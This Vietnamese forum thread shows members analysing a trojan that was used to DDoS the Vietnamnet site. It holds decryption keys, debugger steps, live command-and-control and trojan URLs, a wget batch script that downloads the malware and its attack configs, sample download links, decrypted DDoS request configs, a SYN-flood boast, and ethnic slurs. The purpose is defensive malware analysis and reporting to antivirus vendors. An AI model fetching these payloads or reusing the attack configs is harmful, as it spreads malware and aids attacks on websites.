Lại chia buồn mấy anh stl người Việt bán nước và mấy thằng tàu khựa. Em đã giãi mã ra file txt của anh rồi. Lần này mấy anh chơi mã hoá CAST128/256 cho tất cả hardcode strings trong exe của mấy anh và trong txt lấy về. Key encrypt và decrypt của mấy anh đây: 1. hArd9zlOtY5wU89-: cho hard code string trong exe 2. qjJw4afl979K4quE20pcDhgk8YGbyB: để giãi mã file index.txt down về Dưới đây là 3 hình ảnh minh hoạ file text index.txt sau khi được giãi mã trên bộ nhớ:

Lần này hết chối nhé mấy thằng tàu khựa và mấy thằng Vietnam phản động bán nước. Bà con nên để ý kỹ cái link gạch đỏ cuối cùng, hình số 3, thằng nằm vùng sẽ download thằng trojan: http://option.drfound.net/k113.css này về vào thư mục %temp%iTunes.tmp. File này em đã nhanh tay down về và up lên mediafire + file index.txt đã giãi mã sơ bộ: http://www.mediafire.com/?acqlw6ywkcva3a8 Bây giờ em buồn ngủ rồi, ngày mai rảnh thì em sẽ code tool decode, còn lười thì post hướng dẫn debug cho nhanh. Bà con thông cảm nhé ! Với các bà con dùng OllyDbg, bà con load ituneshelper.exe vào OllyDbg, patch tại address 0040D5EA từ push 60000 thành push 0 (chứ không thì nó "ngủ" đến 1 phút lận). Sau đó đặt breakpoint tại: 0040D812, rồi Run (F9) Khi OllyDbg break, quan sát nội dung memory mà thanh ghi ECX trỏ đến là ta có mệnh lệnh DDOS Vietnamnet đã được giãi mã:

Có được rồi thì terminate OllyDbg liền, đừng run gì nữa.

Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 — GMT

94.242.203.16 ở LUXEMBOURG option.drfound.net với mx2.thesmartsignature.com là 1 nhân tiện các bác phân tích giúp em thằng này, em download ở thesmartsignature.com về http://www.mediafire.com/?bdybn6hsyvm9vci link gốc Code:

http://thesmartsignature.com/cgi-bin/updater-cgi?7LmQrC8pRrqF6iRQGJtYlQF9eW%2FIL8EMYLxfycFpK3nzZejuR6l3rSYOmNp3RABmOEdHGWZEv9IjSwi5D%2Fm5EWToI2ZwfDx7Ingr1BiyQmqJLdOxrPlLL1Br6Iwdw9xnyaCTblidOq1ZzxL78NmglKgnEBmxqeoNyz5E2dxubSMEi3p2B1Hh7oMvhe8%2BGbwtMhjGli%2FZymYjcWN7ZhZDLSMbJSDJp8DG1bGBldUgct5JJ%2BJPnFgdGmYV5EVexygoe2Sd2AhezpM%3D

Phân tích tính chất vài trận DDoS HVA vừa qua.

totden — GMT

mv1098 wrote:

94.242.203.16 ở LUXEMBOURG option.drfound.net với mx2.thesmartsignature.com là 1 nhân tiện các bác phân tích giúp em thằng này, em download ở thesmartsignature.com về http://www.mediafire.com/?bdybn6hsyvm9vci link gốc Code:
http://thesmartsignature.com/cgi-bin/updater-cgi?7LmQrC8pRrqF6iRQGJtYlQF9eW%2FIL8EMYLxfycFpK3nzZejuR6l3rSYOmNp3RABmOEdHGWZEv9IjSwi5D%2Fm5EWToI2ZwfDx7Ingr1BiyQmqJLdOxrPlLL1Br6Iwdw9xnyaCTblidOq1ZzxL78NmglKgnEBmxqeoNyz5E2dxubSMEi3p2B1Hh7oMvhe8%2BGbwtMhjGli%2FZymYjcWN7ZhZDLSMbJSDJp8DG1bGBldUgct5JJ%2BJPnFgdGmYV5EVexygoe2Sd2AhezpM%3D

Mình xem qua, bạn này là file sạch bạn ah.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Kết quả rce sơ bộ file k113.css chứng tỏ nhận định của tui, còn một thằng nằm vùng trên máy của 1visao đã download file k113.css này về. Dùng Plugin PE Extract của PEiD, ta extract ra được hai file .exe giống y chang ituneshelper.exe và iTunesHelper-tray.exe. Các bạn xem kỹ hình minh hoạ. RCE vào thẳng k113.css, ta thấy lần này, coder không dùng overlay hay zip data để nhúng PE file, thay vào đó cậu ta nhúng trực tiếp 2 file exe trên vào vùng .data section luôn, cho nên plugin PE Extract dể dàng extract ra được.

PS: Chà, bà con thức khuya theo dõi dữ ha. Thôi đi ngủ đi bà con, gần hạ màn rồi, giờ chỉ là up các file .exe và thằng exe mạo danh k113.css (Giống cảnh sát 113 quá ha) này lên cho các AVs nhai xương, và report bad links, bad site các cái website sau cho nó đi die luôn cho rồi: Code:

http://wide.ircop.cn
 http://pref.firebay.cn
 http://daily.leteaks.com
 http://link.susaks.com
 http://option.drfound.net

Chúc bà con ngủ ngon, cuối cùng anh em HVA ta đã đi gần tới đích sau mấy tháng trời căng thẳng, mệt mỏi với tụi "sống chết theo lệnh", "sờ ti lợn", "ét ti eo" này -:|-

Phân tích tính chất vài trận DDoS HVA vừa qua.

mrquytk93 — GMT

Sau vài lần lướt web thì thấy topic này có vẻ rất " HOT " Chuyển sang chủ để chính luôn, là HVA có biện pháp gì mới để chống hay không Chứ phân tích cái này rồi cuối cùng vẫn bị DIE thì hơi chán Khoảng đầu tháng 9 mình muốn HVA nghiên cứu sâu hơn về synflood Vì hiện tại với synflood mình có thể cho HVA die bất cứ lúc nào ------------------------------------------------------------------------- Mr.Quy CBG.No1 ADMIN - ATH

Phân tích tính chất vài trận DDoS HVA vừa qua.

vnchampion — GMT

learningandlearning wrote:

Em đã thông báo cho Mediafire về file Unikey trên: http://nethoabinh.com/showthread.php?t=315 Giờ file này đã được xoá :)

Trả trách mình check file đã bị xoá :) không hiểu lý do vì sao. Hôm nay mà không đọc topic này có lẽ mình lại update lên tiếp tục đó. Nếu lần sau bạn có gì cứ PM cho mình nhé, vì mình có trách nhiệm là sửa lại các nội dung Với lại mình không cố ý và không biết là có phải có của STL hay không. :) Hiện nay các phiên bản trên nethoabinh mình đã update lại phiên bản của trên trang chủ Unikey.org Sẽ tiếp tục xoá các hót khác và update lên phiên bản chuẩn của unikey.org

Phân tích tính chất vài trận DDoS HVA vừa qua.

.lht. — GMT

mrquytk93 wrote:

Sau vài lần lướt web thì thấy topic này có vẻ rất " HOT " Chuyển sang chủ để chính luôn, là HVA có biện pháp gì mới để chống hay không Chứ phân tích cái này rồi cuối cùng vẫn bị DIE thì hơi chán Khoảng đầu tháng 9 mình muốn HVA nghiên cứu sâu hơn về synflood Vì hiện tại với synflood mình có thể cho HVA die bất cứ lúc nào ------------------------------------------------------------------------- Mr.Quy CBG.No1 ADMIN - ATH

Có vẻ hơi kiêu ngạo ? Thường thì đứng trước đám đông, người ta phải biết mình là ai và phải biết phép "lịch sự" bạn nhé :| 1) Trước khi bạn "bắt" HVA phải nghiên cứ sâu hơn về synflood, vậy bạn thử phân tích qua về nó xem nào ? Nếu bạn hiểu về nó thì trong quá trình phân tích cũng tìm ra 1 số biện pháp đấy ;-) 2) Theo bạn thì "với synflood bạn có thể cho HVA die kiểu gì và đi đến đâu" ? Chắc bạn hiểu synflood lắm nhỉ ? Vậy chắc bạn biết rõ "synflood đưa HVA về đâu" ...

Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 — GMT

mrquytk93 này mình nhớ không nhầm thì cũng nổi tiếng với vụ botnet qua IRC mà bị mấy bro an ninh mạng mời tới uống trà đá rồi.

Phân tích tính chất vài trận DDoS HVA vừa qua.

1visao — GMT

conmale wrote:

Hello 1visao, Nhờ 1visao tìm trên máy xem có cái "WS2_32.dll" không? Nếu có vui lòng upload lên giúp luôn nha? Cám ơn.

Đây là file anh conmale cần. http://www.mediafire.com/?qiki732uson224n 2 bolzano_1989, TQN , đây là kết quả log Autoruns, Autorunsc , scan lúc 7:30AM sáng nay. http://www.mediafire.com/?uk4q4g8e50ms208 Con malware này không chỉ DDos vào trang index của vietnamnet , mà còn DDos sâu vào thư mục chứa các bài viết, đúng với phân tích của anh conmale về con malware Ddos vào hva.

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

mrquytk93 wrote:

Sau vài lần lướt web thì thấy topic này có vẻ rất " HOT " Chuyển sang chủ để chính luôn, là HVA có biện pháp gì mới để chống hay không Chứ phân tích cái này rồi cuối cùng vẫn bị DIE thì hơi chán Khoảng đầu tháng 9 mình muốn HVA nghiên cứu sâu hơn về synflood Vì hiện tại với synflood mình có thể cho HVA die bất cứ lúc nào ------------------------------------------------------------------------- Mr.Quy CBG.No1 ADMIN - ATH

Nếu HVA không có biện pháp chống thì giờ này bồ còn vô đây để tham gia được hay sao? :-) . Bồ có biết stl bot là gì không? Nếu chưa biết thì đọc từ đầu đến cuối chủ đề này để tìm hiểu. HVA không phải là chỗ để khệnh khạng "nhá hàng" bồ à. Nếu bồ có có thể cho HVA die bất cứ khi nào thì việc gì phải đợi tới đầu tháng 9?

Phân tích tính chất vài trận DDoS HVA vừa qua.

phuongnvt — GMT

mrquytk93 wrote:

Sau vài lần lướt web thì thấy topic này có vẻ rất " HOT " Chuyển sang chủ để chính luôn, là HVA có biện pháp gì mới để chống hay không Chứ phân tích cái này rồi cuối cùng vẫn bị DIE thì hơi chán Khoảng đầu tháng 9 mình muốn HVA nghiên cứu sâu hơn về synflood Vì hiện tại với synflood mình có thể cho HVA die bất cứ lúc nào ------------------------------------------------------------------------- Mr.Quy CBG.No1 ADMIN - ATH

Bồ này sinh năm 93 mà ghê ghớm nhỉ!!!!!!!!!!Bái phục bái phục :-) đúng là "Trường Giang sóng sau đạp sóng trước"

Phân tích tính chất vài trận DDoS HVA vừa qua.

tranhuanltv — GMT

Avira bản cập nhật sáng nay (26/8/2011) đã detect được iTunesHelper.exe là TR/Diple.acxu[trojan]

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

1visao wrote:

conmale wrote:

Hello 1visao, Nhờ 1visao tìm trên máy xem có cái "WS2_32.dll" không? Nếu có vui lòng upload lên giúp luôn nha? Cám ơn.
Đây là file anh conmale cần. http://www.mediafire.com/?qiki732uson224n 2 bolzano_1989, TQN , đây là kết quả log Autoruns, Autorunsc , scan lúc 7:30AM sáng nay. http://www.mediafire.com/?uk4q4g8e50ms208 Con malware này không chỉ DDos vào trang index của vietnamnet , mà còn DDos sâu vào thư mục chứa các bài viết, đúng với phân tích của anh conmale về con malware Ddos vào hva.

Hì hì, hôm bữa anh có nhận được một nhúm packets trên hệ thống của vietnamnet, lúc đó chưa phát hiện ra con trojan, nhưng nhìn qua cái pattern trên đống packets là biết ngay đúng là đồ của stl, không chạy vào đâu được. Cái ws2_32.dll của em sạch. Anh chỉ hơi nghi ngờ. Cái log của em có hai thứ đáng ngờ: AStorDataMgrSvc.exe không có MD5 sum report. iastordatamgrsvc.exe khai báo là phiên bản 10.0.0.1046 nhưng MD5 lại không trùng với giá trị trong database chính thức. PS: Rất tiếc rằng việc "đe doạ" dù chưa được xác định cụ thể những lời "đe doạ" ấy có thật sự đi từ những người có thẩm quyền "đe doạ" hay không hay chỉ là những kẻ "tát nước theo mưa" nhưng những lời đe doạ ấy đã tạo không ít ảnh hưởng đến tâm lý của người tham gia. Những ai đã "đe doạ" xin nhớ rằng, sự thật khó mà che đậy được nếu như nó đã mở rộng ra trước công luận.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

2 anh conmale: ws2_32.dll là file của MS anh à, không cần đâu. Sẵn tiện quãng cáo hàng luôn: trong file DecodeSTLVirus.zip của em có 1 file ws2_32.dll. File này là file dll proxy, đứng trung gian giữa .EXE và ws2_32.dll của MS trong System32 dir. Mọi lệnh call hàm API tới ws2_32.dll của MS sẽ đi qua ws2_32.dll này, nó sẽ bắt và ghi hết lại thành 1 file pcap, sau đó nó mới forward call tới ws2_32.dll thật của MS. Anh cứ chép file ws2_32.dll của em vào cùng thư mục với con trojan, run hay monitor tuỳ thích với trình netword sniffer anh đang dùng. Trong thư mục đấy sẽ có 1 file .cap là PCAP file đấy. Em dùng NetwordMiner để mở và analyze file PCAP này. 2 1visao: Cảm ơn bạn, tôi đã xem file AutoRuns của bạn, chỉ có thằng iTunesxxx mà ta đã biết và 2 file .exe trên mà anh conmale đã đề cập là nghi ngờ. Cậu up giùm 2 file .exe đó lên mediafire luôn nhé ! Đọc file Autoruns của bạn thấy bạn install phần mềm nhiều lắm rồi, còn rác "File not found" nhiều quá. Dùng chính Autoruns xoá đi bạn, gỡ bỏ Symantec và AVG đi, install Avira Personal Free là được rồi, cập nhật nhanh. Ngày hôm qua phải mất gần nữa ngày diệt virus cho máy laptop của đứa em họ, máy nó dùng AVG, chỉ có thằng fake AV "Security Protection" không mà diệt không được. Cuối cùng em phải diệt bằng tay rồi dùng USB KIS scan và diệt. Em đã up file k113.css lên Avira, FSecure, MS, KIS... Chặn từ gốc luôn, down về là bị chụp liền.

Phân tích tính chất vài trận DDoS HVA vừa qua.

1visao — GMT

Cái log của em có hai thứ đáng ngờ: AStorDataMgrSvc.exe không có MD5 sum report. iastordatamgrsvc.exe khai báo là phiên bản 10.0.0.1046 nhưng MD5 lại không trùng với giá trị trong database chính thức.

Đây là file anh conmale , TQN cần . http://www.mediafire.com/?2fck84b2ks5eonu

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

1visao wrote:

conmale wrote:

Hello 1visao, Nhờ 1visao tìm trên máy xem có cái "WS2_32.dll" không? Nếu có vui lòng upload lên giúp luôn nha? Cám ơn.
Đây là file anh conmale cần. http://www.mediafire.com/?qiki732uson224n 2 bolzano_1989, TQN , đây là kết quả log Autoruns, Autorunsc , scan lúc 7:30AM sáng nay. http://www.mediafire.com/?uk4q4g8e50ms208 Con malware này không chỉ DDos vào trang index của vietnamnet , mà còn DDos sâu vào thư mục chứa các bài viết, đúng với phân tích của anh conmale về con malware Ddos vào hva.

Trước hết cám ơn 1visao vì đã tìm ra và cung cấp cho HVA file nghi vấn iTunes.rar. Tuy nhiên trong file này khi extract ra thì có 4 file và (lúc đó) chỉ có 1 file bị Avira và KIS phat hiện là vírus, là file data.mdf, còn file iTunesHelper.exe thì KIS và Avira đều không detect được nó là một Trojan, nhưng tôi nghi nó chính là DDoS tool của STL tấn công vào vietnamnet.vn (như tôi đã viết ở bài viết trên) Hôm nay 26-8-2011 thì Avira đã detect được file iTunesHelper.exe là virus, tên là "TR/Diple.acxu" (hôm trước thì Avira gọi Trojan nhúng trong data.mdf là TR/Diple.acju- tên hơi khác phần đuôi). Đây là phản hồi rất tích cưc của Avira, sau khi anh TQN submit mẫu file iTunesHelper.exe đến Avira (vào chiều hôm qua) Trong bài viết của em trên đây, nhóm từ Con malware này, thì ý em ám chỉ con trojan nào? Có phải là chính iTunesHelper.exe không?

Phân tích tính chất vài trận DDoS HVA vừa qua.

1visao — GMT

2 anh PXMMRF: em không rành về RCE , nên chỉ tình nghi iTunesHelper.exe này là con malware DDos Vietnamnet thông qua tcpview tạo 1 loạt kết nối tới vietnamnet. Máy bị nhiễm là 1 máy vi tính trong 1 công ty.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Con đang DDOS Vietnamnet chính là iTunesHelper.exe đấy anh PXMMRF. Các tấm hình em vừa post chính là minh hoạ quá trình debug con này. Nó đang download index.txt từ http://wide.ircop.cn/index.txt?113, giãi mã ra bằng unzip trên memory và CAST256, sau đó nó dùng thư viện libcurl (thư viện core của chương trình curl) để parse và tấn công crawler theo dạng các tool download nguyên website về đấy anh ! Và iTunesHelper.exe cũng chính là version mới, còn data.mdf cũng là iTunesHelper.exe version củ. Bà con debug và rce file k113.css mà em vừa up lên mediafire sẽ thấy. k113.css khi run sẽ extract ra iTunesHelper.exe và iTunesHelper-tray.exe. 2 1visao: Lại hình như là của stl rồi 1visao. Làm sao mà tụi nó mạo danh nguyên một gói phần mềm của Intel được ???? File của Intel mắc mớ gì lại dùng thư viện CryptoPP làm chi. Cậu up giùm tui các file .dll sau: 1. IAStorCommon.dll 2. IAStorUIHelper.dll 3. IAStorDataMgr.dll 4. SmartPin.dll 5. SysInftLib.dll Nếu quả là của stl thì em chỉ biết chửi nữa chứ làm gì, lan tràn quá rồi. Đúng rồi 1visao à, của stl rồi. Thằng exe này sẽ lấy buffer content mà 1 trong các dll trên download về, parse, lấy nội dung, giãi mã, ghi xuống file rồi CreateProcessA. Khốn nạn thật, đâu mà nhiều "mèo què" của stl thế này không biết. Tụi mày có cả mấy chục thằng code mèo què à ?

Phân tích tính chất vài trận DDoS HVA vừa qua.

1visao — GMT

2 1visao: Lại hình như là của stl rồi 1visao. Làm sao mà tụi nó mạo danh nguyên một gói phần mềm của Intel được ???? File của Intel mắc mớ gì lại dùng thư viện CryptoPP làm chi. Cậu up giùm tui các file .dll sau: 1. IAStorCommon.dll 2. IAStorUIHelper.dll 3. IAStorDataMgr.dll 4. SmartPin.dll 5. SysInftLib.dll

Đây là File của TQN yêu cầu http://www.mediafire.com/?s0h22uffbdu1o24

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

TQN wrote:

Con đang DDOS Vietnamnet chính là iTunesHelper.exe đấy anh PXMMRF. Các tấm hình em vừa post chính là minh hoạ quá trình debug con này. Nó đang download index.txt từ http://wide.ircop.cn/index.txt?113, giãi mã ra bằng unzip trên memory và CAST256, sau đó nó dùng thư viện libcurl (thư viện core của chương trình curl) để parse và tấn công crawler theo dạng các tool download nguyên website về đấy anh ! 2 1visao: Lại hình như là của stl rồi 1visao. Làm sao mà tụi nó mạo danh nguyên một gói phần mềm của Intel được ???? File của Intel mắc mớ gì lại dùng thư viện CryptoPP làm chi. Cậu up giùm tui các file .dll sau: 1. IAStorCommon.dll 2. IAStorUIHelper.dll 3. IAStorDataMgr.dll 4. SmartPin.dll 5. SysInftLib.dll Nếu quả là của stl thì em chỉ biết chửi nữa chứ làm gì, lan tràn quá rồi.

Ừ tôi đã xác định 100% chính iTunesHelper.exe là STL DDoS tool từ sớm hôm qua rồi mà, ngay khi mà 1visao upload file iTunes lên mang. Cả chiều và đêm hôm qua tôi thử nghiệm DDoS tool này trên thưc tế và có một đống dữ liệu, kể cả những master webserver nghi ngờ, như tôi đã viết (trang 23, topic này). Ý tôi hỏi là sợ 1visao lại tìm ra một con Trojan khác DDoS vào vietnamnet.vn, thay vì con iTunesHelper.exe, vì con này ta đã biết rõ rồi. Tôi cũng đã đoc kỹ các bài viết của TQN về khía canh liên quan, mà tôi cũng đang thắc mắc là con gì download iTunesHelper.exe về máy nạn nhân và download từ đâu (Các bài viết này ngay sau bài viết của tôi. Bài viết của tôi đã khẳng định 100% iTunesHelper.exe là DDoS tool, tấn công vào toàn bộ kết cấu hạ tầng mạng của vietnamnet.net)

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Hì hì, thằng nằm vùng down về là cái đống .exe và .dll mà 1visao vừa post đấy anh, hên thế, sao 1visao có hết và up đúng y chang luôn vậy ha ? Dù bạn là ai, có mục đích gì thì tôi cũng phải cảm ơn bạn, và đừng giận tôi vì những nghi ngờ của tôi nhé. Thời buổi loạn hết rồi, khó tin ai được nữa, thông cảm bạn nhé ! @ 1visao: Đúng rồi đó bạn, tôi đã down đống dll đấy về, một đám nằm vùng của bọn stl đấy. Bạn taskkill và delete hết thư mục đấy đi nhé ! Thằng khỉ coder này, sao đi đâu mày cũng CString hết vậy, bộ chỉ biết dùng CString thôi à ? Là em PatchDiff với cái idb của toàn bộ ATLMFC lib "mệt bỏ xừ". Nhưng bù lại code của CString thì nhiều, code của thằng coder này thì ít, có vài dòng à ! À mà quên, tôi có đề nghị nhỏ thế này nè, khi các bạn reply, đừng quote nguyên xi post của người khác, nặng thêm. Vừa rồi tôi về miền Tây, duyệt HVA = GPRS, thấy chậm và dài, lâu lắm.

Phân tích tính chất vài trận DDoS HVA vừa qua.

angel_of_devil — GMT

Anh em cả nghĩ quá rồi, cuộc sống nó thú vị cũng vì những cái như vậy :P

Phân tích tính chất vài trận DDoS HVA vừa qua.

1visao — GMT

2 TQN : Tạm thời mình vẫn chưa đụng chạm gì cái máy này , để tiện cho việc theo dõi và upload các thông tin mọi người cần để RCE mẫu malware này. P/S : Mình chỉ làm 1 chuyện mà mình thấy cần và phải nên làm , không có mục đích gì cả.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Kinh thật, code khá lắm, 1 file exe đăng ký run như 1 service, 5 file dll, mỗi thằng 1 nhiệm vụ khác nhau. Thằng làm trách nhiệm download là thằng IAStoreUIHelp.dll. Tất cả chúng phối hợp nhuần nhuyễn với nhau. Bạn 1visao có nhớ là tại sao, khi nào, download cái gì mà máy trên công ty này của bạn bị dính đám mạo danh IAStore này không ? Bà con ơi, tiếp tục up mẫu thôi. Toàn bộ đống mạo danh IAStore này em đã up ở đây: http://www.mediafire.com/?wv13bdoc4g8f905 Bà con phụ một tay up mẫu cho AVs nhé. Giờ em đi ăn sáng, uống cafe lấy sức đã, tối qua thức tới 3h. Ngày nay lại ngồi lỳ ở nhà nữa rồi, cúp đt thôi. À sẵn tiện nhờ bà con tư vấn cái: vốn em rất lạc hậu về công nghệ, cái máy em đang dùng đây đã gần 10 năm rồi, mua từ 2002, giờ nó tàn và cùi bắp lắm, mới thay bộ nguồn mà ưng là nó restart cái bụp (xe em đi đã 12 năm rồi thì sao, từ thời còn sv hàn vi). Em "phải" mua 1 cái laptop thôi, đi đâu mang theo, chớ ngồi ở nhà hoài bỏ công bỏ việc hết. Bà con biết chổ nào bán máy laptop xài được, màn hình to to, bàn phím bự bự, chất lượng, giá cã phù hợp giới thiệu em một cái. Không cần mạnh đâu, chỉ cần lướt web, vào HVA post bài, theo dõi giá vàng và RCE, code bậy bạ thôi. Cảm ơn trước nhé !

Phân tích tính chất vài trận DDoS HVA vừa qua.

phuongnvt — GMT

bác cứ làm tốt cái vụ này cho xong đi, xong rồi bà con tặng bác 1 con laptop mới :D :D :D :D :D ah mà nếu ko có thì liên hệ tui, tui cho thuê laptop giá rẻ 1 ngày 1 chai ken và 1 ổ bánh mì là được rồi!!!!!!!!!! :D

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

Chào 1visao, file mình cần anh conmale đã yêu cầu bạn gửi rồi: C:\Program Files\Common Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

phuongnvt wrote:

bác cứ làm tốt cái vụ này cho xong đi, xong rồi bà con tặng bác 1 con laptop mới :D :D :D :D :D ah mà nếu ko có thì liên hệ tui, tui cho thuê laptop giá rẻ 1 ngày 1 chai ken và 1 ổ bánh mì là được rồi!!!!!!!!!! :D

Thế có bác nào ở vietnamnet.vn đang vào đây xem thì lên tiếng xem nào. Thanks. Nếu không là tôi kiểm tra đấy nhé. Hì hì. Giỡn chơi thôi!

Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 — GMT

Giờ cái khổ của VietNamNet là biết mà không làm gì được. biết thủ phạm là ai mà không xử lý được, dù vẫn đúng mà không lên tiếng được

Phân tích tính chất vài trận DDoS HVA vừa qua.

cadaochoem — GMT

Bác TQN cứ ra Phong Vũ, coi cái nào hợp nhãn hợp giá tiền. Chấm nó rồi thì việc tiếp theo là lật mặt sau nó lên, thấy địa chỉ phân phối chính hãng hoặc đại lý chính thức (Viễn Sơn thuộc Asus chẳng hạn) rồi đến đó mà mua, giá rẻ nhất, thay thế linh kiện thoải mái. Em toàn làm vậy, tiết kiệm được cả triệu bạc

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Bà con tạo một thư mục Tracker chẵng hạn, chép đoạn bat file này vào file tracker.bat. Lâu lâu mấy bác buồn buồn không biết làm gì thì Enter nó giùm em một cái. Code:

@echo off
echo ===============================================================================
echo Download cac file trojan, bot va DDOS config files cua stl dang DDOS Vietnamnet
echo ===============================================================================
echo.
wget -t3 "http://wide.ircop.cn/index.txt?113" -O wide.ircop.cn_index.txt
wget -t3 "http://pref.firebay.cn/index.txt?113" -O pref.firebay.cn_index.txt
wget -t3 "http://daily.leteaks.com/index.txt?113" -O daily.leteaks.com_index.txt
wget -t3 "http://link.susaks.com/index.txt?113" -O link.susaks.com_index.txt
wget -t3 "http://option.drfound.net/k113.css"

pause

Đoạn bat này sẽ download các file trên về. Sau đó các bạn tạo thêm 1 thư mục chứa ngày tháng mà các bạn down các file trên về, vd: 26_08_2011, chép các file đã download được vào đó. Định kỳ compare một lần, nếu có thấy thay đổi nội dung một trong các file thì báo lên cho bà con biết giùm, còn giống hết thì xoá đi. Cảm ơn bà con tham gia giúp theo dõi. Một mình em cứ chạy tracker 1 đống luôn, compare nữa thì mệt quá, code tool tự động thì lười, thôi thì chịu khó bat file vậy.

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

cadaochoem wrote:

Bác TQN cứ ra Phong Vũ, coi cái nào hợp nhãn hợp giá tiền. Chấm nó rồi thì việc tiếp theo là lật mặt sau nó lên, thấy địa chỉ phân phối chính hãng hoặc đại lý chính thức (Viễn Sơn thuộc Asus chẳng hạn) rồi đến đó mà mua, giá rẻ nhất, thay thế linh kiện thoải mái. Em toàn làm vậy, tiết kiệm được cả triệu bạc

Hì, mình cũng vậy :) . 1visao kiếm tất cả các file sau trong máy tính bị nhiễm virus của STL đó và upload cho mình nhé ;) : "IAStorCommon.dll", "IAStorUIHelper.dll", "IAStorDataMgr.dll", "SmartPin.dll", "SysInftLib.dll" Update: Sorry, mình vừa mới thấy bạn 1visao đã gửi những file trên cho anh TQN rồi.

Phân tích tính chất vài trận DDoS HVA vừa qua.

.lht. — GMT

TQN wrote:

Bà con tạo một thư mục Tracker chẵng hạn, chép đoạn bat file này vào file tracker.bat. Lâu lâu mấy bác buồn buồn không biết làm gì thì Enter nó giùm em một cái. Code:
@echo off
echo ===============================================================================
echo Download cac file trojan, bot va DDOS config files cua stl dang DDOS Vietnamnet
echo ===============================================================================
echo.
wget -t3 "http://wide.ircop.cn/index.txt?113" -O wide.ircop.cn_index.txt
wget -t3 "http://pref.firebay.cn/index.txt?113" -O pref.firebay.cn_index.txt
wget -t3 "http://daily.leteaks.com/index.txt?113" -O daily.leteaks.com_index.txt
wget -t3 "http://link.susaks.com/index.txt?113" -O link.susaks.com_index.txt
wget -t3 "http://option.drfound.net/k113.css"

pause
Đoạn bat này sẽ download các file trên về. Sau đó các bạn tạo thêm 1 thư mục chứa ngày tháng mà các bạn down các file trên về, vd: 26_08_2011, chép các file đã download được vào đó. Định kỳ compare một lần, nếu có thấy thay đổi nội dung một trong các file thì báo lên cho bà con biết giùm, còn giống hết thì xoá đi. Cảm ơn bà con tham gia giúp theo dõi. Một mình em cứ chạy tracker 1 đống luôn, compare nữa thì mệt quá, code tool tự động thì lười, thôi thì chịu khó bat file vậy.

Tạo 1 team nhỏ code những tools nhỏ cần thiết hỗ trợ RCE đi anh :D Ví dụ 1 số tools tự động kiểm tra thường xuyên những link down "mèo què" và tự động detect nếu nó đã bị thay đổi. Những tool như vậy sẽ có ích và giúp tiết kiệm được nhiều thời gian. @Các bạn coder nào rảnh hay không biết phải làm gì thì cùng 1 tay góp sức đi ^^...

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Hì hì, mấy anh stl chắc có cử người ngồi trực topic này phải không mấy anh ? Chắc cũng mệt lắm ha ? Trực làm chi nữa, đã bị "bạch hoá" hết rồi còn gì ! File index.txt lại bị mấy anh đổi content một lần nữa rồi: Code:

UAC+80;//HEA+User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12;//HEA+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;//HEA+Accept-Language: en-us,en;q=0.5;//HEA+Accept-Encoding: gzip,deflate;//HEA+Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7;//HEA+Keep-Alive: 115;//HEA+Connection: keep-alive;//HEA+Referer: ;//HEA+Cookie: <51hqVbyn5d=>;//\;/\
UAC+80;//HEA+User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:5.0) Gecko/20100101 Firefox/5.0;//HEA+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;//HEA+Accept-Language: en-us,en;q=0.5;//HEA+Accept-Encoding: gzip, deflate;//HEA+Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7;//HEA+Connection: close;//HEA+Referer: ;//HEA+Cookie: <51hqVbyn5d=>;//HEA+Cache-Control: max-age=0;//\;/\
UAC+80;//HEA+User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12;//HEA+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;//HEA+Accept-Language: en-us,en;q=0.5;//HEA+Accept-Encoding: gzip,deflate;//HEA+Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7;//HEA+Connection: close;//HEA+Referer: ;//HEA+Cookie: <51hqVbyn5d=>;//\;/\
UAC+80;//HEA+Connection: close;//HEA+Referer: ;//HEA+User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30;//HEA+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;//HEA+Accept-Encoding: gzip,deflate,sdch;//HEA+Accept-Language: en-US,en;q=0.8;//HEA+Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3;//HEA+Cookie: <51hqVbyn5d=>;//\;/\
UAC+80;//HEA+User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27;//HEA+Referer: ;//HEA+Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;//HEA+Accept-Language: en-US;//HEA+Accept-Encoding: gzip, deflate;//HEA+Cookie: <51hqVbyn5d=>;//HEA+Connection: close;//\;/\
